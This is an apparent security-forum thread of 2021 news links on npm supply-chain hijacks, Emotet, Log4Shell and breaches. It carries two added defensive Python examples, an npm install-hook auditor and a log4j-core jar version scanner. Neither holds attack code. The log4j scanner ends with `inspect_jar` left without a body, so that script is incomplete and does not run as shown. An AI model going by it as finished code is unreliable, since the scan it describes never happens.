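Added example for the ua-parser-js and coa posts above, not code from the thread, from npm or from either project: a small offline audit of an npm dependency tree for install-time lifecycle scripts. Both hijacked releases launched their payload from a preinstall hook in package.json, so listing every package that declares preinstall, install or postinstall is the first check to run after such an advisory. Every package.json below is a constructed sample; the version strings, the script file names and the packages other than ua-parser-js and coa are placeholders, not the real published packages.

```python
"""Audit an npm dependency tree for install-time lifecycle scripts.

Added example, not code from the thread or from npm. The hijacked
ua-parser-js and coa releases ran their payload from a "preinstall" hook,
so any package that declares preinstall/install/postinstall deserves a look
after a supply-chain advisory. All package contents here are constructed.
"""
import json
import os

INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_scripts(pkg_json: dict) -> dict:
    """Return only the install-time hooks declared in one package.json."""
    scripts = pkg_json.get("scripts") or {}
    return {hook: cmd for hook, cmd in scripts.items() if hook in INSTALL_HOOKS}


def audit_tree(packages: dict) -> list:
    """packages maps a path such as "node_modules/foo" to its parsed package.json.
    Returns (name, version, {hook: command}) for every package that would run
    code during `npm install`, sorted by name and version."""
    hits = []
    for path, pkg in packages.items():
        hooks = install_scripts(pkg)
        if hooks:
            hits.append((pkg.get("name", path), pkg.get("version", "?"), hooks))
    return sorted(hits, key=lambda h: (h[0], h[1]))


def load_node_modules(root: str) -> dict:
    """Build the mapping audit_tree expects from a real node_modules directory."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as fh:
            try:
                found[os.path.relpath(dirpath, root)] = json.load(fh)
            except ValueError:
                continue  # unparsable package.json: skipped here, worth a manual look
    return found


# Constructed sample tree (not real package contents). "preinstall.js",
# the versions and the last two package names are hypothetical.
SAMPLE_TREE = {
    "node_modules/ua-parser-js": {
        "name": "ua-parser-js", "version": "0.0.0-sample",
        "scripts": {"preinstall": "node preinstall.js", "test": "jest"},
    },
    "node_modules/coa": {
        "name": "coa", "version": "0.0.0-sample",
        "scripts": {"preinstall": "node preinstall.js"},
    },
    "node_modules/left-pad-like": {
        "name": "left-pad-like", "version": "1.0.0",
        "scripts": {"test": "node test.js"},          # no install hook: not listed
    },
    "node_modules/native-addon": {
        "name": "native-addon", "version": "2.1.0",
        "scripts": {"install": "node-gyp rebuild"},   # legitimate native build
    },
}

if __name__ == "__main__":
    for name, version, hooks in audit_tree(SAMPLE_TREE):
        print(f"{name}@{version}: {hooks}")
```

A hit is a lead, not a verdict: native add-ons such as the `native-addon` sample legitimately build from an install hook, so the list has to be read against what each package is for. For the install itself, `npm ci --ignore-scripts` against a committed lockfile stops every such hook from running, which is the default a CI runner should use.
-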
Weekly Security News Roundup w/e 11-5-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/05/19/47/crXhqHVlGtA/preview.jpg)
https://youtu.be/n_unu7rpJ-4
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
What does Facebook's facial recognition shutdown mean for its users?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/08/14/26/crXj2OVl70a/preview.jpg)
https://youtu.be/RpoqWIQqlk4
Is there really any benefit to the average user in Facebook's move to shut down this service?
How do you protect yourself from this technology?
Thanks to Joe Bosso's excellent article on this topic. https://blog.avast.com/author/joe-bosso
-
FBI warns of Iranian hackers looking to buy US orgs’ stolen data
https://www.bleepingcomputer.com/news/security/fbi-warns-of-iranian-hackers-looking-to-buy-us-orgs-stolen-data/
-
AMD fixes dozens of Windows 10 graphics driver security bugs
https://www.bleepingcomputer.com/news/security/amd-fixes-dozens-of-windows-10-graphics-driver-security-bugs/
-
Weekly Security News Roundup w/e 11-12-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/12/21/35/crXlraVIhxD/preview.jpg)
https://youtu.be/tBvndGkeJDc
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
News Flash Update - FBI System Hacked
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/14/14/54/crX22LVIjjj/preview.jpg)
https://youtu.be/tzrAA81XLok
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
-
News Flash Update - FBI System Hacked
https://youtu.be/tzrAA81XLok
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
Hoax Email Blast Abused Poor Coding in FBI Website
https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/
https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails
-
News Flash Update - FBI System Hacked
https://youtu.be/tzrAA81XLok
On 11/13/2021 the Federal Bureau of Investigation (FBI) email servers were hacked
to distribute spam email.
Hoax Email Blast Abused Poor Coding in FBI Website
https://krebsonsecurity.com/2021/11/hoax-email-blast-abused-poor-coding-in-fbi-website/
https://www.fbi.gov/news/pressrel/press-releases/fbi-statement-on-incident-involving-fake-emails
Hindsight is a wonderful thing. :)
-
https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10
-
https://www.businessinsider.com/pentagon-official-quit-saying-us-cybersecurity-no-match-china-2021-10
All the breaches and blunders pretty much prove his point.
-
High severity BIOS flaws affect numerous Intel processors
https://www.bleepingcomputer.com/news/security/high-severity-bios-flaws-affect-numerous-intel-processors/
-
Here are the new Emotet spam campaigns hitting mailboxes worldwide
https://www.bleepingcomputer.com/news/security/here-are-the-new-emotet-spam-campaigns-hitting-mailboxes-worldwide/
-
What is a PUP (Potentially Unwanted Program)
"A PUP is a program that may be unwanted, despite the possibility that users consented to download it.
PUPs include spyware, adware, and dialers, and are often downloaded in conjunction with a program that the user wants."
Microsoft seems to have taken that meaning a bit further.
It's applying that term to any program that also, by default, installs one or more
other programs not selected by the user, even if the user is given the opportunity
to bypass the installation of that other, possibly unwanted, program.
Someone just asked me about something that Microsoft tagged as a "PUA:Win32/PiriformBundler"
This is a perfect example of Microsoft's new inclusion of programs to be classified as PUPs.
Here is how Microsoft describes this version of a PUP:
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=PUA%3AWin32%2FPiriformBundler
-
US, UK warn of Iranian hackers exploiting Microsoft Exchange, Fortinet
https://www.bleepingcomputer.com/news/security/us-uk-warn-of-iranian-hackers-exploiting-microsoft-exchange-fortinet/
https://us-cert.cisa.gov/ncas/alerts/aa21-321a
-
Costco Discloses Data Breach After Finding Card Skimmer At One Of Its Stores
https://www.forbes.com/sites/leemathews/2021/11/12/costco-discloses-data-breach-after-finding-card-skimmer-at-one-of-its-stores/?sh=4c70de3b49fc
https://securityaffairs.co/wordpress/124534/data-breach/costco-data-breach.html
-
Google Chrome 96 breaks Twitter, Discord, video rendering and more
https://www.bleepingcomputer.com/news/google/google-chrome-96-breaks-twitter-discord-video-rendering-and-more/
-
Weekly Security News Roundup w/e 11/19/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/19/17/34/crXqb4VIOCA/preview.jpg)
https://youtu.be/r8WY8tPtfKY
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
Six million Sky routers exposed to takeover attacks for 17 months
https://www.bleepingcomputer.com/news/security/six-million-sky-routers-exposed-to-takeover-attacks-for-17-months/
https://www.pentestpartners.com/security-blog/skyfail-6-million-routers-left-exposed/
-
Even after 7 years Agent Tesla malware still kneecaps Windows security.
Re: https://www.virustotal.com/gui/url/a00a741102b59c2b3a62faeca85c5ee906876711e1af2ac0557d382f3f283d35/detection
and read: https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/
polonus
-
11/22/2021 Breaking Security NewsFlash
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/22/21/20/crX3rYVI4o8/preview.jpg)
https://youtu.be/ecknxFAlrqs
Another security breach. This time it's Go Daddy.
See the full article at How-To Geek
https://www.howtogeek.com/770477/huge-godaddy-data-breach-exposes-over-a-million-accounts/
-
New Windows zero-day with public exploit lets you become an admin
https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
-
New Windows zero-day with public exploit lets you become an admin
https://www.bleepingcomputer.com/news/microsoft/new-windows-zero-day-with-public-exploit-lets-you-become-an-admin/
Attackers exploiting zero-day vulnerability in Windows Installer — Here’s what you need to know and Talos’ coverage
https://blog.talosintelligence.com/2021/11/attackers-exploiting-zero-day.html
-
7 Scams Targeting Holiday Shoppers
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/24/14/57/crXZ2PVIkeh/preview.jpg)
https://youtu.be/vroEAk7jCEs
Steer clear of cyber-trouble this year with these seven scams
to watch out for during the holidays.
Thanks to Grace Macej for her excellent article on this topic.
https://blog.avast.com/author/grace-macej
-
Weekly Security News Roundup w/e 11-26-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/11/26/21/14/crXOr2VImXG/preview.jpg)
https://youtu.be/qQ1WL-q_ALs
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They usually do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
8-year-old HP printer vulnerability affects 150 printer models
https://www.bleepingcomputer.com/news/security/8-year-old-hp-printer-vulnerability-affects-150-printer-models/
-
Emotet now spreads via fake Adobe Windows App Installer packages
https://www.bleepingcomputer.com/news/security/emotet-now-spreads-via-fake-adobe-windows-app-installer-packages/
-
6 Tips to Protect Holiday Tech
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/02/23/48/crln0JV2naN/preview.jpg)
https://youtu.be/lQKxVksqQ_4
Just in time for the holidays. Some security tips for those new toys.
My thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/how-to-protect-a-new-technology-purchase-avast
-
CoinHelper Danger and Avoidance
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/02/23/50/crln0KV2nzc/preview.jpg)
https://youtu.be/7TP4xYV15xQ
CoinHelper, an unexpected payload with cracked, illegal, unauthorized
and repackaged copies of software.
Thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/author/christopher-budd
-
Weekly Security News Roundup w/e 12-3-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/03/17/11/crlebXV2f8I/preview.jpg)
https://youtu.be/DBRhsKrxVz8
Security-related news thanks mostly to Avast Software.
I'm just a messenger. They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
FBI: Cuba ransomware breached 49 US critical infrastructure orgs
https://www.bleepingcomputer.com/news/security/fbi-cuba-ransomware-breached-49-us-critical-infrastructure-orgs/
-
Stay away from Verizon's Custom Experience
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/04/14/36/crlf2zV21Ju/preview.jpg)
https://youtu.be/P5zprILAGyo
If you're a Verizon customer and value your data, opt out of Verizon's Custom Experience.
Read the full story on this topic written by Dave LeClair, editor at How-To Geek (https://www.howtogeek.com/).
-
Convincing Microsoft phishing uses fake Office 365 spam alerts
https://www.bleepingcomputer.com/news/security/convincing-microsoft-phishing-uses-fake-office-365-spam-alerts/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Here's the link.
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
-
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Emotet now drops Cobalt Strike, fast forwards ransomware attacks
Here's the link.
https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/
Oops, thanks Bob. :)
-
Has the surveillance technology industry
found another powerful ally?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/09/13/53/crlQIMV2rNZ/preview.jpg)
https://youtu.be/6hVf21-czow
There is always a fine balance between spying and/or protection
when it comes to surveillance.
Thanks to Joe Bosso for his excellent article on this topic.
https://blog.avast.com/author/joe-bosso
-
Massive attack against 1.6 million WordPress sites underway
https://www.bleepingcomputer.com/news/security/massive-attack-against-16-million-wordpress-sites-underway/
-
Weekly Security News Roundup w/e 12-10-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/10/14/03/crl62eV2T3D/preview.jpg)
https://youtu.be/MhY_yLGpzIY
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
-
Is the Avast Business Hub also affected by the Log4j problem?
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
-
Botnets like Mirai now come with Log4j aboard.
Re: -https://mvnrepository.com/artifact/net.mamoe/mirai-logging-log4j2
Made that link non-clickable because it has repositories (pol).
Re: https://urlhaus.abuse.ch/browse.php?search=mirai+ (already forced offline).
polonus
-
What is Log4j and Do You Need to Worry About it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/13/21/35/crlIraV2y0k/preview.jpg)
https://youtu.be/b2EpVYWZQLY
A new vulnerability called Log4j has security teams scrambling worldwide.
Here's what you need to do - and what you don't need to do - about it.
Thanks to Christopher Budd for his excellent article on this topic.
https://blog.avast.com/author/christopher-budd
Details on this vulnerability are described here:
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
-
Almost complete blocklist provided:
https://blog.fox-it.com/2021/12/12/log4shell-reconnaissance-and-post-exploitation-network-detection/
Warning: various mutations seen in the wild: https://threatpost.com/apache-log4j-log4shell-mutations/176962/
polonus
-
Beware of a New Amazon Token Crypto Scam
https://blog.avast.com/beware-of-a-new-amazon-token-crypto-scam
-
Beware of a New Amazon Token Crypto Scam
https://blog.avast.com/beware-of-a-new-amazon-token-crypto-scam
12/14/2021 Security News Flash - Amazon Token Crypto Scam
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/14/15/06/crl2o1V2aAz/preview.jpg)
https://youtu.be/us2C3YvMXF0
Look out for offers to purchase nonexistent Amazon cryptocurrency tokens.
Thanks to Jakub Vávra for his excellent article on this topic.
https://blog.avast.com/author/jakub-v%C3%A1vra
-
Avast - 2022 Predictions
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/14/17/05/crl2bhV2aWJ/preview.jpg)
https://youtu.be/Z9XJjAbbFHQ
Avast's prediction of what the 2022 Cyber security landscape will look like.
Thanks to Grace Macej for her excellent information on this topic.
https://blog.avast.com/author/grace-macej
-
In case you'd like predictions and opinions on next year's
cybersecurity landscape from a variety of experts in the field.
https://blog.emsisoft.com/en/39386/cyber-security-predictions-for-2022-what-the-experts-expect/
-
If you're using Gmail and other online services,
be extremely careful.
The spam filter isn't working as well as it used to.
My inbox has seen way too many emails that are spam.
Here's just one sample I just received.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/15/17/17/crlobbV2g4b/preview.jpg)
Read the headers. If you aren't expecting an email, trash it.
Even better, put it in the spam folder where it belongs.
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/16/19/41/crlDqpV25Q2/preview.jpg)
https://youtu.be/QusvmKD0afY
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is: do you trust Google not to somehow benefit from rummaging through your data?
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is: do you trust Google not to somehow benefit from rummaging through your data?
No more or less than any other online storage service.
To protect the corporation, they actually need to do this to weed out the stuff that can get Google (Alphabet) into hot water.
-
12-16-2021 GOOGLE DRIVE WILL BEGIN INFORMING ITS USERS
OF CONTENT VIOLATIONS VIA EMAIL
<snip image>
https://youtu.be/QusvmKD0afY
Here is my take on Google's newest information release about files stored on Google Drive.
Thanks to ChromeUnboxed for their excellent article on this topic.
https://chromeunboxed.com/google-drive-violation-notice/
Interesting - whilst I have never used Google Drive and have no intention of doing so.
In order for Google to identify content violations they must have analytic access to your files. So the question is: do you trust Google not to somehow benefit from rummaging through your data?
No more or less than any other online storage service.
To protect the corporation, they actually need to do this to weed out the stuff that can get Google (Alphabet) into hot water.
Which is just one reason why I don't use any on-line storage medium, I also haven't any social networking accounts.
-
Lenovo laptops vulnerable to bug allowing admin privileges
https://www.bleepingcomputer.com/news/security/lenovo-laptops-vulnerable-to-bug-allowing-admin-privileges/
https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
-
Lenovo laptops vulnerable to bug allowing admin privileges
https://www.bleepingcomputer.com/news/security/lenovo-laptops-vulnerable-to-bug-allowing-admin-privileges/
https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
Lenovo again. Can anyone remember, a long time ago, when Lenovo products had a chip that had been hacked, a bug in it that could deliver malware?
-
Weekly Security News Roundup w/e 12-17-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/17/20/02/crlbYnV2mcS/preview.jpg)
https://youtu.be/AKUHgwwPi3I
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
-
Tackling the real big Log4Shell insecurity.
Re: https://snyk.io/blog/log4shell-remediation-cheat-sheet/
polonus
-
Microsoft warns of easy Windows domain takeover via Active Directory bugs
https://www.bleepingcomputer.com/news/microsoft/microsoft-warns-of-easy-windows-domain-takeover-via-active-directory-bugs/
-
New Dell BIOS updates cause laptops and desktops not to boot
https://www.bleepingcomputer.com/news/technology/new-dell-bios-updates-cause-laptops-and-desktops-not-to-boot/
-
In trouble again. AWS Amazon now down for the third time this month.
See: https://downdetector.com/status/amazon/ & https://istheservicedown.com/problems/amazon
Re: https://www.tellerreport.com/tech/2021-12-22-amazon-is-experiencing-outage-for-the-third-time-in-a-short-time.ryxq23loF.html
polonus
-
It's that time of year.
Be careful; even spam blockers are having problems.
I received this in my in-box this morning.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/22/18/19/crl3FqV2NA3/preview.jpg)
-
NVIDIA discloses applications impacted by Log4j vulnerability
https://www.bleepingcomputer.com/news/security/nvidia-discloses-applications-impacted-by-log4j-vulnerability/
-
Weekly Security News Roundup w/e 12-24-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/12/26/16/08/crlODjV2RSy/preview.jpg)
https://youtu.be/Y1OiQQrQg_E
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
https://www.lunasec.io/docs/blog/log4j-zero-day/
It's already been patched.
As always, you need to update to be safe.
Update - Update - Update
Researchers release 'vaccine' for critical Log4Shell vulnerability
https://www.bleepingcomputer.com/news/security/researchers-release-vaccine-for-critical-log4shell-vulnerability/
http://github.com/Cybereason/Logout4Shell
Hackers start pushing malware in worldwide Log4Shell attacks
https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
Most infections can be directly attributed to neglect.
They neglected to update the system with the latest available security patches and the system got hacked.
No different here.
Log4j: List of vulnerable products and vendor advisories
https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
All Log4j, logback bugs we know so far and why you MUST ditch 2.15
https://www.bleepingcomputer.com/news/security/all-log4j-logback-bugs-we-know-so-far-and-why-you-must-ditch-215/
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
Log4j 2.17.1 out now, fixes new remote code execution bug
https://www.bleepingcomputer.com/news/security/log4j-2171-out-now-fixes-new-remote-code-execution-bug/
https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/
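The Log4j headlines in this post move through four fix levels (2.15, 2.16, 2.17, 2.17.1), so the practical follow-up to "Update - Update - Update" is an inventory of which log4j-core jars are actually on a box and how far each one lags. What follows is an added example, not code from this thread or from any of the sites linked above. It assumes the jars sit under a local directory tree, takes the version from the jar's own META-INF/MANIFEST.MF (`Implementation-Version`) and falls back to the `log4j-core-x.y.z.jar` file name, and treats 2.17.1 as the minimum for the 2.x line on Java 8 and newer (the backport branches for older Java runtimes are outside its scope, so it flags them for manual review). The `make_jar` helper builds constructed, minimal jars only so the scanner can be exercised without real log4j builds.

```python
"""Inventory log4j-core jars under a directory and grade each against the
fix levels the thread cites. Added example with the assumptions stated in
the lead-in; not the thread's or any project's own code."""
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# Assumption: 2.17.1 is the floor for the 2.x line on Java 8+ (it fixes
# CVE-2021-44832, per the checkmarx link above).
MIN_SAFE: Version = (2, 17, 1)

# The intermediate releases named in the headlines and why each was superseded.
SUPERSEDED = {
    (2, 15, 0): "fixed CVE-2021-44228 but was itself superseded ('ditch 2.15')",
    (2, 16, 0): "DoS bug, fixed in 2.17",
    (2, 17, 0): "CVE-2021-44832 (JDBC appender), fixed in 2.17.1",
}

CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_LOOKUP_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
NAME_RE = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")


@dataclass
class Finding:
    path: str
    version: Optional[Version]
    has_jndi_lookup: bool
    verdict: str


def parse_version(text: str) -> Optional[Version]:
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def version_from_manifest(zf: zipfile.ZipFile) -> Optional[Version]:
    """Read Implementation-Version from the jar manifest, if present."""
    try:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    except KeyError:
        return None
    for line in manifest.splitlines():
        if line.startswith("Implementation-Version:"):
            return parse_version(line.split(":", 1)[1])
    return None


def assess(version: Optional[Version], has_jndi: bool) -> str:
    if version is None:
        return "unknown version, review manually" + (", JndiLookup present" if has_jndi else "")
    if version >= MIN_SAFE:
        return "ok"
    if version in SUPERSEDED:
        return "upgrade: " + SUPERSEDED[version]
    if has_jndi:
        return "upgrade: pre-2.15 with JndiLookup, exposed to CVE-2021-44228 (Log4Shell)"
    # JndiLookup removed (the 'vaccine' style mitigation) but the jar is still old.
    return "upgrade: pre-2.15, JndiLookup removed; mitigation only, still update"


def inspect_jar(path: str, data: Optional[bytes] = None) -> Optional[Finding]:
    """Return a Finding for a jar carrying log4j-core classes, else None.
    `data` lets a caller hand over jar bytes directly instead of a path."""
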